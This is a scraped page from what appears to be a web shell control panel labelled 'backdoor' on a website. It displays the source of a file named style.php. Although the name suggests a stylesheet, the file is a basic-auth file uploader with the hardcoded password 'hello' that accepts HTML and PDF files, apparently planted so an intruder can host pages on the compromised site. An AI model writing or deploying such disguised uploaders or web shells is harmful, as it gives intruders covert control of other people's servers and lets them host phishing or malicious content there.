Website : rimsha.abasa.com
backdoor
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
self
/
cwd
/
Filename :
style.php
back
Copy
<?php // ======================= // Configuration // ======================= $upload_dir = __DIR__ . '/video/'; // Folder relative to this script $upload_url = 'video/'; // URL relative path for downloads $auth_user = 'admin'; // Change to your username $auth_password = 'hello'; // Change to your password // ======================= // Ensure upload directory exists // ======================= if (!is_dir($upload_dir)) { mkdir($upload_dir, 0755, true); } // ======================= // Authentication // ======================= if ( !isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER'] !== $auth_user || $_SERVER['PHP_AUTH_PW'] !== $auth_password ) { header('WWW-Authenticate: Basic realm="Secure File Manager"'); header('HTTP/1.0 401 Unauthorized'); exit('Unauthorized'); } // ======================= // Handle file upload // ======================= if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $filename = $_FILES['file']['name']; $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); // Allow only PDF & HTML $allowed_extensions = ['pdf', 'html', 'htm']; if (!in_array($ext, $allowed_extensions)) { echo "❌ Only PDF and HTML files are allowed."; exit; } // Normalize filename: trim dangerous control characters $safe_name = preg_replace('/[\/\\\\?%*:|"<>]/u', '_', $filename); $target = $upload_dir . $safe_name; if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { $url_encoded = $upload_url . rawurlencode($safe_name); echo "✅ File uploaded: <a href=\"$url_encoded\" target=\"_blank\">" . htmlspecialchars($safe_name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</a>"; } else { echo "❌ Failed to upload file."; } exit; } // ======================= // Show file list (NO deletion) // ======================= $files = scandir($upload_dir); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Secure File Manager</title> </head> <body> <h2>Upload PDF or HTML File</h2> <form method="POST" enctype="multipart/form-data"> <input type="file" name="file" accept=".pdf,.html,.htm" required /> <button type="submit">Upload</button> </form> <h2>Files in Folder</h2> <ul> <?php foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $file_url = $upload_url . rawurlencode($file); $file_name = htmlspecialchars($file, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); $size = filesize($upload_dir . $file); $size_kb = round($size / 1024, 2); echo "<li><a href=\"$file_url\" target=\"_blank\">$file_name</a> — {$size_kb} KB</li>"; } ?> </ul> </body> </html>